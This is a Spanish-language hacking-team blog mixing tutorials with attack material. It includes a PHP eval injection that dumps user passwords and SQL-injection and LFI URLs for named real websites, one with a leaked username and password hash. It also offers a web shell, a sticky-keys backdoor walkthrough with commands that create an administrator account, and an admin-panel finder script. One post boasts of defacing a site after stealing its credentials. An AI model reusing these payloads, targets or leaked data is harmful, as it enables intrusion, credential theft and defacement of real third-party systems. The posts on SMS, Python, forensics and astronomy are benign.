[H] Risk T [S]

Connection Hijacking

2011-06-09T19:07:00.000-07:00

Bueno, despues de mucho tiempo, vuelvo a postear un poco de contenido en este blog que lo tuve abandonado por un largo tiempo. Hoy, veremos la importancia que tiene la funcion mysql_close() al momento de cerrar una conexion MySql con PHP. Algunos admins por no decir la mayoria, no lo usan ya que piensan que la conexion, se cierra completamente al final el script, y muchos otros no le dan importancia.

Primeramente, como es de esperar, nos veremos con el code vulnerable:

$la = $_GET['v'];
$server='localhost';
$user='root';
$pass='';
$db='alumnos';

$conexion=mysql_connect($server,$user,$pass)
or die("Problemas en la conexion");
mysql_select_db($db,$conexion);

if(mysql_query('select * from users where d=1'))   {
echo "Consulta ejecutada";
}else   {
echo "No se pudo ejecutar la consulta";
   }
if(isset($la)) {

eval($la);
}?>

En este caso particular, como no se ha cerrado la conexion SQL y tampoco ha finalizado el script, todavia se puede hacer uso productivo de la conexion SQL. ¿Que podemos hacer?
Simple, lo que la imaginacion nos de :)

http://localhost/la.php?v=$sql=mysql_query('select * from users'); while($r=mysql_fetch_assoc($sql)) { echo "
".$r['name']." ".$r['password']."
";}

Una screen de lo que devuelve al ejecutar esa URI

Fuente: http://yoyahack.blogspot.com/search/label/php

Saludos Dr [F]

Mult1 Converter

2010-08-31T16:58:00.000-07:00

r Mult1 Converter, es una tool creada por mi para simplificar el manejo de encriptaciones de cadenas alfanumericas, esta misma, esta hecha en PHP. y es muy simple de comprender, no pretendan grandes cosas la hize en 25 minutos jaja.. sin mas preambulo, les dejo el code :)

http://pastebin.com/sFZf8DTq

Por favor en caso de uso, respetar los derechos de autor :)

Saludos

Dr [F]

Reto Hackertest !

2010-08-31T13:28:00.000-07:00

Hola a todos, les dejo aqui un pequeño paper, de como pasar hasta el nivel 15 (por que me dio pereza escribir) los retos de hackertest

Nunca esta demas aclarar que hackertest, es un wargame para novatos, los de medio y alto nivel no se gasten haciendo estos a menos que esten aburridos. Mas adelante, yo mismo hare un wargame, pero con casos reales jaja..

Saludos

Se los dejo en un .txt, para que no haya problemas, saludos :)

Megaupload !

Dr [F]

Blind SQLi

2010-08-27T02:47:00.000-07:00

Blind SQLi

Ataque a ciegas de inyeccion SQL. Es una tecnica de ataque que utiliza inyeccion sql. Cuando una web por motivos de seguridad no muestra mensajes de error de la base de datos, al no devolver informacion se muestra siempre el mismo contenido (y solo se mostrara el poco contenido que hay si el resultado es correcto)

Los administradores de los sitios desactivan el SHOW_ERRORS y SHOW_WARNINGS para que no se muestren posibles erorres provocados en el interprete Sql. Estos errores son utilizado por SqLi para obtener informacion para concretar dicho ataque.
En Sqli podemos atacar sin necesidad de esta informacion. Una aplicacion web recibe datos desde el cliente. Los datos que realizamos en id en el caso de este tutorial, se utilizan para construir la consulta Sql.
En una SQLi normal cuando enviamos en la variable vulnerable la consulta nos imprime el resultado. Pero en BSQLi no nos imprime nada. Apartir de si muestra informacion o no muestra, inyectamos valores true o false.

Fuente: Wikipedia

PD: Con el tutorial lo van a entender mejor..

Descarga AQUI

Saludos

Dr [F]

¿Por que los sms permiten 160 caracteres?

2010-08-25T15:26:00.000-07:00

¿Por que los sms permiten 160 caracteres?

La razon por que los mensajes no pueden exceder los 160 caracteres de longitud. Al parecer, en sus comienzos los sms se pensaron como mensajes de control, no como un servicio a disposicion del usuario y de hecho van por canales de control y no por los de voz.

La inclusion de SMS estaba apunto de ser una idea que estaba apunto de ser descartada de las especificaciones GSM ya que no se le veia ningun futuro. jajaja. Parecido a los que decian que internet no iba a tener futuro jajaj.

De hecho el estándar permite 140 bytes de "user data" o "payload". Para aprovecharlos mejor, se usa una codificación de 7 bits por carácter, con lo cual de los 140 * 8 = 1120 bits te salen 1120 / 7 = 160 caracteres codificados en 7 bits.

Otro dato de interés es que los SMS provocaron la caída de la red GSM en múltiples ocasiones puesto que los enlaces troncales de señalización eran de muy bajo tráfico. El caso es que como nadie se esperaba el éxito de los mensajitos cortos, éstos colapsaron el medio y por tanto los teléfonos dejaron de funcionar. Por esta razón hubo que redimensionar la red de señalización.

Fuente:

SQLi | www.urdinarrain.gov.ar

2010-08-22T18:01:00.000-07:00

Vulnerabilidades de tipo iSql encontradas en www.urdinarrain.gov.ar

Variable vulnerable en iSql: http://www.urdinarrain.gov.ar/noticias/noticias.php?id='

Fecha de reportaje: 22/8

Reportador: Dr [F]
Descubierto por: Sthefano02

Tipo de vulnerabilida: iSql

Tambien la web es vulnerable a XSS que se da por la mala validacion de entradas en el buscador :)

saludos

Dr [F]

SQLi | www.preserveplanet.org

2010-08-21T21:46:00.000-07:00

Sitio vulnerable a SQL Injection www.preservplanet.org

Fecha de reportaje: 22/8

Hora del reporte: 1.40 am

Reportador: Dr [F]
Descubierto por: Sthefano02

Mail de reporte: luisdiego@preservplanet.org

Tipo de vulnerabilida: iSql

Variable vulnerable: http://www.preserveplanet.org/spanish/noticias.php?id='

User: mushroom87

Password: 510b6e7391dc97ba86de431fb1bbe478

Saludos

Dr [F]

Libros de visita vulnerables a HTML Injection

2010-08-21T21:18:00.000-07:00

K0DAK Web Sh33LL! (1.2)

2010-08-21T16:07:00.000-07:00

Hola gente, les dejo en su poder la version 1.2 de K0D4K Web Sh33LL!, esta version, trae incorporado una Admin Panel finder y trae corregido un bug del UPLOAD y el bug de la prompt de comandos.. Aca el code :)

Code :)

Saludos

Dr [F]

LFI | www.fhpr2a.fr/portail

2010-08-19T21:13:00.000-07:00

Vulnerabilidad de tipo L.F.I encontrada en www.fhpr2a.fr/
Esta vulnerabilidad de encuentra en la parte doc.php que nos permite ver archivos alojados en el mismo servidor, variable vulnerable:

http://www.fhpr2a.fr/portail/doc.php?file=

Ej: http://www.fhpr2a.fr/portail/doc.php?file=../habillage/global.css.php

Saludos

Dr [F]

Sqli Lab

2010-08-19T20:11:00.000-07:00

Hola, les vengo a dejar una aplicacion vulnerable a Sql injection para que puedan ver y practicar a nivel local para no ir tumbando o defaceando servidores web.. (eso no es bien visto en este mundo), sin mas preambulo, los codes :)

Code vulnerable

Guarden eso en un archivo PHP y creen la siguiente tabla:

create table users (

id int(10) unsigned auto_increment,

name varchar(25),

password varchar(40),

country varchar(30),

primary key(id)

);

Bueno, esa es la estructura de la tabla y listo ya podemos ingresar nuestra consulta, creo que es mas que obvio que seria en la variable id no ¿?

una consulta podria ser asi:

http://localhost/la.php?id=-1+union+all+select+1,table_name,3,4+from+information_schema.tables+limit+30,1--

Saludos :)

Dr [F]

SQLi | www.kanco.org

2010-08-16T19:06:00.000-07:00

Vulnerabilidad tipo Sqli encontrada en www.kanco.org variable vulnerable:

http://www.kanco.org/news.php?NoticeID='

Fecha de reporte al Administrador:

Dia: Lunes 16/8

Hora: 23:00

Medio de comunicacion: E-mail

K0DAK Web Sh33LL! (1.1)

2010-08-14T14:14:00.000-07:00

Buenas :). Aqui les dejo la segunda version de K0D4K Web Sh33LL!, esta segunda version, posee un Upload de archivos al servidor y depaso se le arreglaron las vulnerabilidades de tipo XSS que se habian encontrado.

Code:

http://pastebin.com/J2W65m4i

Archivo para descargar:

http://www.megaupload.com/?d=4Z2JPZ0I

El reportador de los bugs fue Shell Root. Gracias Alex

XSS | www.ferroweb.com.ar

2010-08-14T13:11:00.000-07:00

Vulnerabilidad de tipo XSS encontrada en www.ferroweb.com.ar

Saludos

Dr [F]

Funcion para conectar a MySql

2010-08-11T01:11:00.000-07:00

Hola, aca les dejo el codigo de una pequeña pero util funcion que lo que hace es permitir la conexion a una base de datos de tipo MySql, en esta, se pasan 4 parametros. host,user,pass,database.

Code:

<?php
function conectar($host,$user,$pass,$database) {
$conectar = mysql_connect($host,$user,$pass) or die (mysql_error());
mysql_select_db($database,$conectar);
return $conectar;
}
$conexion = conectar("localhost","root","","alumnos");
?>

Bueno, pongamosle conect.php, un ejemplo de su uso en un codigo, seria el siguiente:

<?php

include "conect.php";

$registro = mysql_query("select codigo,nombre,pass,mail

from alumnado where mail='$_REQUEST[mail]'",$conexion)

or die("problemas en select".mysql_error());

if($reg=mysql_fetch_array($registro))

{

echo "Nombre: ".$reg['nombre'];

echo "<br>";

echo "Mail: ".$reg['mail'];

echo "<br>";

echo "Pass: ".$reg['pass'];

}else {

echo "No";

}

mysql_close($conexion);

Ataques DoS - DDoS

2010-08-09T02:02:00.000-07:00

Bueno, para entender que es un ataque DDoS, primero debemos saber que es un ataque DoS.

¿Que es un ataque DoS ?

Bueno, un servidor (ya sea una web o un blog) esta preparado para soportar un numero de conexiones simultaneas. Cuando excede el numero de estas conexiones pueden llegar a pasar dos cosas:

1) Que no responda a mas peticiones entrantes

2) Que se desconecte de la red (queda offline)

Entonces si un ordenador, malintencionado, solicita un numero de peticiones mayores a las que soporta nuestro servidor puede llegar a saturar los puertos y provocar que este deje de funcionar correctamente. Este es el ataque DoS (Denial of service) que se traduce como denegacion de servicio

Como se aprecia en la imagen el ordenador atacante satura al ordenador victima

(consumiendo sus recursos) y asi queda imposibilitado un ordenador comun para acceder a la

web.Los recursos que se consumen son acho de banda, memoria ram, etc.

Tambien puede pasar que el ataque sea tan excesivo (consuma demasiados recursos)

que el administrador de la web la desconecte de internet hasta que haya pasado el ataque o hasta que lo haya logrado repelerlo.

En la imagen, el servidor se esta desconectando de internet (no acepta ninguna conexion)

entonces el DoS falla.

¿Como se puede prevenir este ataque?

Bloqueando la Ip (del atacante, claro esta) desde la web

Ataque DDoS:

Cuando el ataque se realiza desde un solo ordenador, es facil de bloquear, se detecta la IP y se

bloquea y listo pero existe una variante de el ataque DoS que es cuando se ataca al servidor de

distintos ordenadores distribuidos en diferentes puntos del mundo.

Este ataque DDos (distribute denial of service)

Denegacion de servicio distribuida, es una ampliacion del DoS.

Este tipo de ataque se lleva a cabo con ordenadores zombie, que son ordenadores comunes

controlados por un software o troyano (por una tercera persona) que permite manipularlos.

De esta forma es posible coordinar un ataque de miles de ordenadores contra una web.

¿Como defendernos de un DDoS?

si tienes un hosting compartido (como puede ser webcindario.com, etc), sera el host

quien se tendra que defender y no tu, ya que no tendras acceso al servidor atacado.

Pero en cambio si te encuentras en un servidor dedicado/virtual (que sea tuyo completamente),

tendras que recurrir a diversas herramientas complejas no aptas para usuarios con escasos

conocimientos en esta area.

XSS | www.village.com

2010-08-07T19:44:00.000-07:00

Vulnerabilidad tipo XSS encontrada en la pagina www.village.com, este tipo de XSS no pasa los datos mediante la url, asi que no se puede hacer casi nada con esta vulnerabilidad..

K0DAK Web Sh33LL! (1.0)

2010-08-07T13:22:00.000-07:00

Hola gente, les dejo aqui la primer version de K0DAK Web Sh33ll!. Codeada por mi (Dr [F])

Espero que les guste, se la dedico especialmente al team [H] Risk T [S], gracias por el apoyo que me brindan para seguir adelante, tambien les agradezco a CPH y EL Hacker, dos grandes comunidades de las cuales he aprendido muchisimo.

Caracteristicas de K0D4K Web Sh3LL!:

Idioma: Español

Codigo Abierto

Diseño personalizado

Vision de directorios

Modificaciones de Directorios

Informacion del servidor

Ejecutar comandos por consola (cmd -> Windows)

La puede descargar de AQUI
y El codigo fuente se los dejo en PASTEBIN

Aca les dejo algunas Screens:

Un Saludo a todos los leectores

Dr [F]

Introduccion a la Informatica Forense

2010-08-06T19:39:00.000-07:00

El cómputo forense, también llamado informática forense, computación forense, análisis forense digital o examinación forense digital es la aplicación de técnicas científicas y analíticas especializadas a infraestructura tecnológica que permiten identificar, preservar, analizar y presentar datos que sean válidos dentro de un proceso legal.

Dichas técnicas incluyen reconstruir el bien informático, examinar datos residuales, autenticar datos y explicar las características técnicas del uso aplicado a los datos y bienes informáticos.

Recuperando Datos de la Papelera de Reciclaje

La papelera de reciclaje es un area de almacenamiento de la memoria que se guardan los archivos antes de que sean eliminados de una particion.

Directorio de almacenamiento Real:

El directorio real donde se almacenan los archivos que están en la Papelera de reciclaje varía de acuerdo al sistema operativo o al sistema de archivos que tenga la partición. Así, en el sistema de archivos FAT (usado típicamente en sistemas windows 9x), el directorio se ubica en X:\RECYCLED (siendo X una letra de la unidad cualquiera), mientras que en el sistema de archivos NFTS y en Windows NT/2000/XP esta se encuentra en X:\RECYCLER (siendo X una letra de la unidad cualquiera), con excepción de windows vista el cual guarda los archivos en el directorio X:\$Recycle.Bin.

¿Como trabaja la papelera de reciclaje?

Los archivos que están guardados en la Papelera de reciclaje (y por ende, en el directorio real) son renombrados como Dxy.ext, donde x es la letra de la unidad donde se encontraba este archivo (tales como "c", "d", etc.); y es un número, asignado de forma secuencial partiendo del cero; y ext es la extensión original del archivo. Sin embargo, el nombre original es mostrado en la Papelera, esto porque se crea un archivo oculto sin extensión llamado "info2" ("info" en Windows 95) que almacena el nombre y la ubicación original.

en el caso de que se quisiera recuperar el archivo eliminado (por medio del comando Restaurar este elemento).

Fuente Wikipedia :)

Para seguir con este tutorial, vamos a hacer uso de dos herramientas, una que nos permite ver todos los archivos que fueron eliminados de la papelera de reciclaje llamda Restoration, que la pueden descargar de AQUI...

La otra herramienta se llama Refiuti, que es una herramienta que permite saber cuando fue eliminado un archivo, que es de vital importancia para este tema en el que nos estamos adentrando. El refiuti, lo podemos descargar de AQUI.

Una vez descargado e instalado el Restoration, lo abrimos, y nos va a aparecer una pantallita como esta.

Cuando veamos esta pantallita, daremos click en el boton Search Deleted Files, esto nos buscara todos los archivos borrados.

Esto es todo de esta herramienta, ahora pasaremos a usar rifiuti, que ya dijimos para que servia, cuando lo instalamos, lo desconmprimimos en system32 para tocar en la consola de comandos rifiuti y ya poder acceder a esta.

Bueno, como ya dijimos (por mi parte como tengo XP) la ruta donde se encuentra mi carpeta de la papelera de reciclaje, es la siguiente. C:\Recycler y accedemos al SID de mi papelera que es el siguiente

C:\RECYCLER\S-1-5-21-73586283-1202660629-725345543-500\

Muchos se estaran preguntando ¿Como averiguo el SID de la papelera de mi sistema?

Es facil: Si tenemos solo un usuario, vamos a MI PC --> Herramientas --> Opciones de carpeta --> Ver. y en la opciones que dice mostrar todos los archivos y carpetas ocultos, lo activamos.

Luego, en el mismo lugar y en Ocultar archivos por el sistema operativo,

Asi veriamos el SID de la papelera de nuestro S.O

Bueno ahora vamos a nuestra consola de cmd.exe y vamos a ejecutar el rifiuti

Colocamos este codigo

rifiuti C:\RECYCLER\S-1-5-21-73586283-1202660629-725345543-500\INFO2

y nos va a devolver algo como esto:

ahi veriamos la fecha de eliminacion y el tamaño del archivo que hay en la papelera.

Bueno, eso fue todo.. :). Despues sacare mas tutoriales acerca de este interesante tema que es la informatica forense.

Un saludo.

Dr [F]

Movimiento juvenil no Pasaran [Vulnerabilidad SQLi]

2010-08-06T16:55:00.000-07:00

Recientemente, navegando por internet, nos topamos con una web http://www.np.org.ar/, que poseia una vulnerabilidad de tipo Sqli, esto, fue reportado al administrador de la web y esperamos el pronto parcheamiento de la misma

La vulnerabilidad reside en

http://www.np.org.ar/noticias.php?not_id='

Academia de la Nasa [Vulnerabilidad SQLi]

2010-08-05T16:53:00.000-07:00

Bueno, navegando por ahi me encontre con una vulnerabilidad de tipo SQLi a la Universidad de la NASA. Esta vulnerabilidad no es comun como todas las demas, es algo diferente. Esta, no empieza con -1.

No dejaremos el link vulnerable, y menos los datos sacados. Si no tienen experiencia, y consiguieron los datos, les aconsejo que no se loggeen, ya que con la pasta que tiene esta empresa, les ira mal.

Web: http://www.nasa-academy.org/

High Risk Security Team

XSS | www.minutouno.com

2010-08-04T02:32:00.000-07:00

Recuerden, que tienen un manual de xss en el blog :)

XSS: www.minutouno.com

SQLi a Highstat.cl

2010-08-02T22:50:00.000-07:00

Hace unos minutos, charlando con el resto del equipo llamado "High Risk Security Team", decidimos entrar en nuestra tarea de "reportar" paginas web con vulnerabilidades al descubierto (bueno, una de nuestras tareas) y nos encontramos con Highstat que presentaba una vulnerabilidad de tipo SQLi.
Este error, es visible en http://highstat.cl/noticias/index.php?noti=.

Al ver esto con el equipo, decidimos "probarnos" de hasta donde podiamos llegar. Esto, nos llevo a seguir con la inyeccion hasta dar con el usuario y contraseña de la pagina. Inmediatamente de "averiguar" esos datos, conseguimos el mail, y reportamos el fallo. Pero como cada uno de nosotros sabiamos que ningun administrador te hace caso con solo mandarle un mail reportandole la vulnerabilidad, decidimos asustarlo un poco y modificar levemente la estructura de la pagina.

Este es uno de los primeros logros del team y decidimos plasmarlo en una imagen en nuestro posteo, este quedara grabado por siempre en cada una de nuestras memorias.

High Risk Security Team

Aprende Python con "Python Para Todos"

2010-08-02T02:32:00.000-07:00

Peso: 1,21 MB
Paginas: 160
Tipo: .pdf

Click aqui para descargar [Mi Subida]

Sthefano02

Bytes!

Python: Todo sobre este gran lenguaje

2010-08-02T02:22:00.000-07:00

¿Qué es Python?

Python es un lenguaje de programación creado por Guido van Rossum a principios de los años 90 cuyo nombre está inspirado en el grupo de cómicos ingleses “Monty Python”. Es un lenguaje similar a Perl, pero con una sintaxis muy limpia y que favorece un código legible.

¿De donde puedo descargarlo?

Puedes descargarlo desde la pagina oficial de python:

http://python.org/download/

¿Sobre que trata?

Se trata de un lenguaje interpretado o de script, con tipado dinámico, fuertemente tipado, multiplataforma y orientado a objetos

¿Lenguaje intrepretado o de script?

Un lenguaje interpretado o de script es aquel que se ejecuta utilizando un programa intermedio llamado intérprete, en lugar de compilar el código a lenguaje máquina que pueda comprender y ejecutar directamente una computadora (lenguajes compilados).

La ventaja de los lenguajes compilados es que su ejecución es más rápida. Sin embargo los lenguajes interpretados son más flexibles y más portables

Tipado dinámico

La característica de tipado dinámico se refiere a que no es necesario declarar el tipo de dato que va a contener una determinada variable, sino que su tipo se determinará en tiempo de ejecución según el tipo del valor al que se asigne, y el tipo de esta variable puede cambiar si se le asigna un valor de otro tipo.

Fuertemente tipado

No se permite tratar a una variable como si fuera de un tipo distinto al que tiene, es necesario convertir de forma explícita dicha variable al nuevo tipo previamente. En otros lenguajes el tipo de la variable cambiaría para adaptarse al comportamiento esperado, aunque esto es más propenso a errores.

Multiplataforma

El intérprete de Python está disponible en multitud de plataformas (UNIX, Solaris, Linux, DOS, Windows, OS/2, Mac OS, etc.) por lo que si no utilizamos librerías específicas de cada plataforma nuestro programa podrá correr en todos estos sistemas sin grandes cambios. Y no solo eso, sino que tambien podremos convertir nuestro archivo .py a .exe para que corra sin necesidad de tener instalado el interprete en Windows.

Orientado a objetos

La orientación a objetos es un paradigma de programación en el que los conceptos del mundo real relevantes para nuestro problema se trasladan a clases y objetos en nuestro programa. La ejecución del programa consiste en una serie de interacciones entre los objetos.

Python también permite la programación imperativa, programación funcional y programación orientada a aspectos

¿De que consta un codigo python?

Python no necesita clases, ni funciones, ni nada de nada para poder funcionar, con solo crear un archivo llamado .py podemos utilizarlo.

¿Que puedo crear con python?

Puedes crear infinidad de cosas en Python, ya que este cuenta con muchas librerias para todos los usos que podamos darles. Podemos crear chats, malware, bases de datos, calculadoras, encriptadores, etc... Todo depende de nuestra imaginacion

Click aqui para ver la Libreria de Python

¿Python puede utilizar interfaces graficas?

Si, puede. Tales como PyGame (para programar juegos), PyQT, PyTK, PyGTK, wXPython, Gist, etc.

Aprende Python Gist con este excelente manual

Aprende PyGTK con este manual con mas de 400

PyQT: Desarrollando aplicaciones de escritorio

Links Interesantes:

Guia de manuales en la seccion de CPH

GUia de codes/aportes interesantes de CPH

Cross Site Scripting

2010-07-31T20:21:00.001-07:00

Bueno gente, aca les voy a dejar un posteito que llevo hace bastante tiempo (aproximadamente cuatro dias) realizandolo y me termino de quedar "Lindo", por lo menos para mi jaja. Bueno en fin, les dejo el "Temario" del manual para descargar para que puedan ver el tipo de contenido.

0x001: Palabras iniciales

0x002: ¿Que es XSS?

0x003: Codes de paginas vulnerables/Taller de pruebas

0x004 : ¿Qué son las cookies?

0x005 : Explicación para explotar la vulnerabilidad

0x006: Tipos de XSS

0x007 : Escenario de ataque XSS reflejado

0x008 : Métodos de inyección y tipos de ataque

0x009: Disfrasando la URL à Mostrar como encriptar

0x010: ByPassing de filtros

0x011: Arreglando el Fallo

Pd: Antes de que me olvide son 14 hojas en formato word, incluye imagenes y codigos fuente para que puedan practicar

PD: Aca tienen la pagina para poder practicar lo que se dice en el tutorial sin la necesidad de montar ningun servidor web

http://www.pruebas18p.webcindario.com/webv.php

Aqui los archivos para descargar:

MegaUpload

RapidShare

Cambiando Icono con Resource Hacker

2010-07-31T09:05:00.000-07:00

Hola, en este tutorial, les enseñare a cambiar el icono de nuestra aplicacion con el famoso software:
Resource Hacker, este programa lo pueden descargar AQUI.
Y aqui tambien les dejo un Pack de iconos, que nos sera de gran utilidad para el proceso de modificacion de nuestro archivo.
Los pueden descargar de AQUI.

Bueno, aca les dejo el tutorial para descargar en formato de Word, este viene acompañado con imagenes para seguir la lectura, Bueno en fin, aca les dejo el archivo.

MegaUpload

RapidShare

Les dejo una screen de lo que se puede realizar con este software (el archivo es el mismo, noten la diferencia en el icono)

Saludos

Dr [F]

PD: Cualquier duda o sugerencia ser tan amables de postearla en los comentarios :)

Como "Hackearon" Facebook

2010-07-30T09:20:00.000-07:00

Metodo Utilizado
Muy ingenioso el ataque, Aparentemente no se trató de un acceso indebido a los sistemas, sino de una ingeniosa burla al sistema de traducción que le permite a los usuarios proponer mejoras en las traducciones a otros idiomas distintos al inglés. Básicamente lo que hicieron un grupo de usuarios fue crear cientos de perfiles falsos, y con ellos proponer mejores traducciones en forma masiva. Como Facebook posee este sistema de “escuchar a los usuarios”, si muchos usuarios proponen traducciones iguales el cambio se aplica automáticamente y queda vulnerable a este tipo de incidentes. ¿Qué pueden hacer los usuarios? Nada, en este caso sólo esperar que la gente de Facebook corrija las traducciones que quedaron erróneas.

Ahora se comprende porque aparecian frases en portugues, luego en turco, y algunas en castellano. Se ve que compartieron el metodo en algun irc/foro y comenzaron a hacerlo varios grupos distintos.

Fuente: no recuerdo la fuente, enseguida la recuerda la posteo :)

Foot Tampering

2010-07-28T21:54:00.000-07:00

En esta oportunidad les traigo un tutorial de como sacarle el jugo al Foot Tampering, el manual se los dejo para descargar en formato word, consta de siete imagenes que acompañan a la leectura.

El Foot Tampering, es una tecnica que consiste en la explotacion de alguna falla estupida al estilo de ByPassear un filtro de un maxlenght en un input. Antes que nada, no se puede considerar al Foot Tampering como un bug, ya que no explota ningun fallo de segurdad, solo se podria decir que es una tecnica para "ayudarnos" a explotar alguna falla de seguridad.

RapidShare

MegaUpload

Telescopio Hubble descubre estrella superveloz que se aleja de la galaxia

2010-07-28T09:24:00.000-07:00

Después de que se encontrara ayer una estrella más grande de lo que se creía que podría existir, la NASA informó hoy que el Hubble encontró una estrella que se mueve a hipervelocidad y está siendo expulsada de la Vía Láctea a 2,5 millones de kilómetros por hora.

La velocidad es tres veces mayor a la que tiene nuestro sol en su órbita por la galaxia. La pregunta ahora es:

¿por qué se mueve tan rápido?

La elaborada teoría de la NASA es que hace unos 100 millones de años, un sistema de tres estrellas probablemente se acercó demasiado al centro de la galaxia, y un hoyo negro se tragó una de ellas. El momentum (impulso) de la estrella capturada se transfirió a las otras dos, haciendo que se dispararan violentamente fuera del centro. A medida que avanzaban a alta velocidad, la más grande de las dos absorbió a la otra, creando la bola de gas azul hiperrápida que captó el Hubble ahora.

Esta teoría intenta responder a una serie de interrogantes.

De acuerdo a su distancia del centro de la Vía Láctea (a unos 200.000 años luz), los astrónomos sugieren que la estrella tiene 100 millones de años, sin embargo, como es una gigante azul y tiene una gran masa, debería haber vivido tan sólo 20 millones de años antes de consumirse. La capacidad del Hubble de medir la trayectoria de la estrella confirma que viene del centro de la Vía Láctea, lo que lleva a suponer que obtuvo el tamaño y color después, al fusionarse dos estrellas.

Seguir a este sol podría dar a los investigadores algunas pistas de cómo se forman las galaxias y como la materia oscura influencia a los cuerpos celestes.

Fuente: FayerWayer

Fallo de seguridad en sethc.exe

2010-07-25T10:39:00.000-07:00

0x001 StickyKeys

0x002 Sistemas afectados

0x003 Aprovechamiento del fallo

0x004 Escalada de privilegios

0x001: SickyKeys

StickyKeys: Es una opcion de accesibilidad de Windows. Se produce al presionar teclas en algun orden logico (como puede ser presionar cinco veces la tecla shift). Al presionar esta tecla cinco veces, nuestra maquina emite un "BIP" y se ejecuta el proceso sethc.exe

Aca les dejo una web con algunas caracteristicas sobre el uso de StickyKeys
Click AQUI para acceder a la web.

Aqui les dejo una imagen de la ventana de StickYKeys (que se produce al presionar cinco veces la tecla shift como bien habiamos dicho)

0x002 Sistemas Afectados

No estoy seguro, pero creo que este proceso puede ser ejecutado en:

Windows NT
Windows XP (SP1, SP2) ----> En el SP3 el agujero de seguridad fue parcheado
Windows Vista

0x003 Aprovechando el Fallo

Aqui llega la parte mas entretenida que muchos estaban esperando con ansias. La pregunta seria..

¿Como podemos usar este proceso para nuestro beneficio?
Muy simple, que tal si les dijera que cada vez que presionemos cinco veces la tecla shift se les abriera una prompt de comandos (cmd.exe) con privilegios de Administrador ?
¿Estaria estupendo no?

Bueno, nos situamos en nuestra cuenta limitada y presionamos cinco veces la tecla shift, y vemos si se activa el proceso sethc.exe, si se abre la ventana de StickyKeys ¡Eureca!. Podremos aprovechar el fallo.

Screen del stickykeys con su respectivo proceso.

Bueno para hacer lo que dijimos mas arriba (eso de abrir el cmd presionando la tecla shift) lo haremos, copiando el archivo sethc.exe con otro nombre y copiando al cmd.exe con el nombre de sethc.exe

el archivo sethc.exe se encuentra en: %windir%\system32\sethc.exe

para hacer esto, vamos a nuestra querida consolita negra (inicio->Ejecutar->cmd.exe) y escribimos lo siguiente:

cd %windir%\system32

copy sethc.exe sethc_copia.exe

copy cmd.exe sethc.exe

Ahora dejo una screen de como quedaria todo eso tecleado:

Bueno y ahora cerramos el cmd.exe, presionamos 5 veces shift y taran! magicamente se nos abre una pantallita igual a la que cerramos.

Aclaro que para hacer todo esto si tenemos una cuenta con privilegios limitados, es necesario reiniciar la pc apretar F8 y arrancar del modo consola.

0x004: Escalando Privilegios.

Ahora nos crearemos una cuenta Administradora de la computadora, en mi caso le pondre
usuario: franco
password: contrasenia

Todo esta tarea de añadir a administradores y crear la cuenta lo hare del PROMPT de comandos.

Una vez que tenemos abierta la consola (apretando cinco veces shift) teclearemos lo siguiente:

net user usuario password /add /expires:never

Que en mi caso seria
net user franco contrasenia /add /expires:never

Con este comando ya tenemos una cuenta de usuario, ahora le daremos privilegios de administrador con el siguiente comando

net localgroup Administradores franco /add

Listo ya tenemos nuestra cuenta con privilegios de admin :)

Espero que les haya gustado, cualquier duda/critica ya saben dejen un comentario o mandenme un mail.

By Dr [F]

Admin panel Finder

2010-07-21T16:33:00.000-07:00

Hola gente, aca les dejo un pequeño script que desarolle en php, para encontrar el panel de administracion de un sitio web, el script consta de dos paginas (indexx.html y adminp.php)

Bueno sin mas preambulos les dejo el codigo:

indexx.htm

<html>
<head>
<link rel="stylesheet" href="estilos.css" type="text/css">
<title>Admin Panel Finder</title>
</head>
<body>
<center>
<c>[</c><t>B</t><c>]</c><t>B</t><in> i</in><c>  [</c><t>S</t><c>]</c>
</center>
<font face="Comic Sans Ms">
<center>
<br><br>
<form method="post" action="adminp.php">
Ingrese la web:
<input type="text" name="web" value="www.example.com.ar" size="30">

<br><br>
<input class="botonsubmit" type="submit" value="Go !">
</center>
</font>
</form>
</body>
<!-- Gracias al foro www.foro.elhacker.net.. una gran comunidad ! --!>
</html>

adminp.php

<html>
<head>
<title> Admin Panel Finder Dr [F] </title>
</head>

<!-- Estilo de admin panel --!>

<body style="cursor: crosshair;">
<center>
<font face="Courier New">
<h1><font color=red>[</font><b>!</b><font color=red>]</font> Panel Finder <font color=red>[</font><b>!<font color=red>]</font></h1>
<font face="Comic Sans MS"><h3>By</h4><font color=red>
<h2>Dr <font color=red>[</font><b><font color=black>F</font></b><font color=red>]</font></h1></font></font>
<br>
</center>

<?php
$pagina=$_REQUEST['web'];
$target = $pagina;
$array= array(
 'admin/','ADMIN/','paneldecontrol/','login/','adm/','cms/',
'admon/','ADMON/','administrador/','administrator/','admin/login.php',
'ADMIN/login.php','admin/home.php','admin/controlpanel.html','admin/controlpanel.php',
"admin1.php", "admin1.html", "admin2.php", "admin2.html", "yonetim.php", "yonetim.html", "yonetici.php", "yonetici.html", "ccms/", "ccms/login.php", "ccms/index.php", "maintenance/", "webmaster/", "adm/", "configuration/", "configure/", "websvn/", "admin/", "admin/account.php", "admin/account.html". "admin/index.php", "admin/index.html", "admin/login.html", "admin/home.php", "admin/controlpanel.html", "admin/controlpanel.php", "admin.php", "admin.html", "admin/cp.php", "admin/cp.html", "cp.php", "cp.html", "administrator/", "administrator/index.html", "administrator/index.php", "administrator/login.html", "administrator/login.php", "administrator/account.html", "administrator/account.php", "administrator.php", "administrator.html", "login.php", "login.html", "modelsearch/login.php", "moderator.php", "moderator.html", "moderator/login.php", "moderator/login.html", "moderator/admin.php", "moderator/admin.html", "moderator/", "account.php", "account.html", "controlpanel/", "controlpanel.php", "controlpanel.html", "admincontrol.php", "admincontrol.html", "adminpanel.php", "adminpanel.html", "admin1.asp", "admin2.asp", "yonetim.asp", "yonetici.asp", "admin/account.asp", "admin/index.asp", "admin/login.asp", "admin/home.asp", "admin/controlpanel.asp", "admin.asp", "admin/cp.asp", "cp.asp", "administrator/index.asp", "administrator/login.asp", "administrator/account.asp", "administrator.asp", "login.asp", "modelsearch/login.asp", "moderator.asp", "moderator/login.asp", "moderator/admin.asp", "account.asp", "controlpanel.asp", "admincontrol.asp", "adminpanel.asp", "fileadmin/", "fileadmin.php", "fileadmin.asp", "fileadmin.html", "administration/", "administration.php", "administration.html", "sysadmin.php", "sysadmin.html", "phpmyadmin/", "myadmin/", "sysadmin.asp", "sysadmin/", "ur-admin.asp", "ur-admin.php", "ur-admin.html", "ur-admin/", "Server.php", "Server.html", "Server.asp", "Server/", "wp-admin/", "administr8.php", "administr8.html", "administr8/", "administr8.asp", "webadmin/", "webadmin.php", "webadmin.asp", "webadmin.html", "administratie/", "admins/", 